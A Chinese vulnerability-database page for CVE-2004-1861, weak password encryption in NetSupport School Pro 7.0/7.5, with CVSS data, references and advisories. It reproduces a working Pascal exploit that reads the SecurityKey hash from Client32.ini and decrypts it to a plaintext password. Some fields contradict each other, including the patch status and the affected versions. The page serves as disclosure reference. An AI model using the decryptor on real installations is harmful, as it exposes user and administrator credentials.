CVE-2004-1861
CVSS4.6
发布时间 :2004-03-25 00:00:00
修订时间 :2016-10-17 23:01:54
NMCOES    

[原文]Invision NetSupport School Pro uses a weak encryption algorithm to encrypt passwords, which allows local users to obtain passwords.


[CNNVD]NetSupport School弱加密密码漏洞(CNNVD-200403-109)

        
        NetSupport School是一款网络课堂解决方案。
        NetSupport School加密机制不够强壮,本地攻击者可以利用这个漏洞获得用户和管理员的密码信息。
        由于应用程序加密机制不够强壮,攻击者可解密出明文密码信息。
        

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:netsupport:netsupport_school:7.5
cpe:/a:netsupport:netsupport_school:7.0
cpe:/a:netsupport:netsupport_school:7.0_1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1861
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1861
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200403-109
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=108032304932321&w=2
(UNKNOWN)  BUGTRAQ  20040326 NetSupport School Pro: Password Encryption Weaknesses
http://www.securityfocus.com/bid/9981
(VENDOR_ADVISORY)  BID  9981
http://xforce.iss.net/xforce/xfdb/15621
(VENDOR_ADVISORY)  XF  netsupportschoolpro-weak-encryption(15621)

- 漏洞信息

NetSupport School弱加密密码漏洞
中危 设计错误
2004-03-25 00:00:00 2005-10-20 00:00:00
本地  
        
        NetSupport School是一款网络课堂解决方案。
        NetSupport School加密机制不够强壮,本地攻击者可以利用这个漏洞获得用户和管理员的密码信息。
        由于应用程序加密机制不够强壮,攻击者可解密出明文密码信息。
        

- 公告与补丁

        厂商补丁:
        NetSupport
        ----------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.netsupport-inc.com/nss/netsupport_school_overview.htm

- 漏洞信息 (23882)

NetSupport School 7.0/7.5 Weak Password Encryption Vulnerability (EDBID:23882)
linux local
2004-03-26 Verified
0 spiffomatic 64
N/A [点击下载]
source: http://www.securityfocus.com/bid/9981/info

NetSupport School is prone to a password-encryption vulnerability because the application fails to protect passwords with a sufficiently effective encryption scheme. 

Exploiting this issue may allow an attacker to access user and administrator passwords for the affected application.

program name;
uses crt;
var i,j,length,x,y,crazy:integer;
    passfile:text;
    line:string;
    password,p:array [1..100] of char;
    known,convert:array [1..26,1..3] of char;
    ch,tempx,tempy,key:char;

procedure conv;
begin
convert[1,1]:='E';
convert[1,2]:='M';
convert[1,3]:='A';
for i:=2 to 26 do begin
    if convert[i-1,2]='P' then begin
       convert[i,1]:=chr(ord(convert[i-1,1])+1);
       convert[i,2]:='A';
    end
    else begin
         convert[i,1]:=convert[i-1,1];
         convert[i,2]:=chr(ord(convert[i-1,2])+1);
    end;
    convert[i,3]:=chr(ord(convert[i-1,3])+1);
end;
end;

procedure hex(a,b:char; num:integer);
begin
if num>0 then begin
for i:=1 to num do begin
    if b='P' then begin
       b:='A';
       a:=chr(ord(a)+1);
    end else inc(b);
end;
end;
if num<0 then begin
for i:=-1 downto num do begin
    if b='A' then begin
       b:='P';
       a:=chr(ord(a)-1);
    end else dec(b);
end;
end;
tempx:=a;
tempy:=b;
end;

function compare(a,b:char):char;
begin
for i:=1 to 26 do begin
if (a=convert[i,1])and(b=convert[i,2]) then compare:=chr(i+64);
end;
end;

function diff(a,b,c,d:char):integer;
var num1,num2,num3:integer;
begin
num1:=ord(a)*16+ord(b);
num2:=ord(c)*16+ord(d);
num2:=num2;
diff:=num2-num1;
end;


Begin
{get the hash from client32.ini}
clrscr;
Writeln(' _________________________________________________________');
Writeln('|NetSupport School Pro Password decryptor                 |');
Writeln('|Credits goto: Drexel University, Harry Hoffman, Mr. Flynn|');
Writeln('|and my wonderful fiance Halley                           |');
Writeln(' ---------------------------------------------------------');
Writeln('');
   assign (passfile,'C:\Progra~1\NetSup~1\Client32.ini');
   reset (passfile);
   i:=0;
   while not eof(passfile) do
   begin
        line:='';
        while not EoLn(passfile) do
        begin
             Read(passfile, ch);
             line:=line+ch;
             if line='SecurityKey=' then begin
                while not eoln(passfile) do
                begin
                  inc(i);
                  read(passfile,ch);
                  password[i]:=ch;
                end;
                length:=i;
             end;
        end;
        readln(passfile,line);
   end;
   write('Hash: ');
   for i:=1 to length do write(password[i]);
writeln('');
{decrypt the hash}
conv;
known[1,1]:='E';
known[1,2]:='M';
known[2,1]:='9';
known[2,2]:='O';
known[3,1]:='>';
known[3,2]:='A';
known[4,1]:='B';
known[4,2]:='C';
known[5,1]:='F';
known[5,2]:='E';
known[6,1]:=':';
known[6,2]:='G';
known[7,1]:='>';
known[7,2]:='I';
known[8,1]:='B';
known[8,2]:='K';
known[9,1]:='F';
known[9,2]:='M';
known[10,1]:=':';
known[10,2]:='O';
known[11,1]:='?';
known[11,2]:='A';
known[12,1]:='C';
known[12,2]:='C';
known[13,1]:='G';
known[13,2]:='E';
known[14,1]:=';';
known[14,2]:='G';
known[15,1]:='?';
known[15,2]:='I';
{get the first char}
for i:=1 to round(length/2) do p[i]:=chr(65);
for x:=1 to round(length/2) do begin
    crazy:=0;
    crazy:=-(round(length/2))+x;
    for y:=1 to round(length/2) do crazy:=crazy-(ord(p[y])-65);
    hex(password[x*2-1],password[x*2],crazy);
    p[x]:=chr(diff(known[x,1],known[x,2],tempx,tempy)+65);
end;
writeln('');
write('Password: ');
for i:=1 to round(length/2) do begin
    write(p[i]);
end;
readkey;

end.
		

- 漏洞信息

16733
NetSupport School Pro Password Storage Encryption Weakness

- 漏洞描述

- 时间线

2004-03-26 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

NetSupport School Weak Password Encryption Vulnerability
Design Error 9981
No Yes
2004-03-26 12:00:00 2007-09-10 09:41:00
Discovery of this issue is credited to "spiffomatic 64" <spiffomatic64@hotmail.com>.

- 受影响的程序版本

NetSupport School 7.5
NetSupport School 7.0 1
NetSupport School 7.0
NetSupport School 7.50f1

- 不受影响的程序版本

NetSupport School 7.50f1

- 漏洞讨论

NetSupport School is prone to a password-encryption vulnerability because the application fails to protect passwords with a sufficiently effective encryption scheme.

Exploiting this issue may allow an attacker to access user and administrator passwords for the affected application.

- 漏洞利用

The following exploit has been provided:

- 解决方案

The vendor has released updates to address this issue. Please contact the vendor for details on obtaining and applying the appropriate updates.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站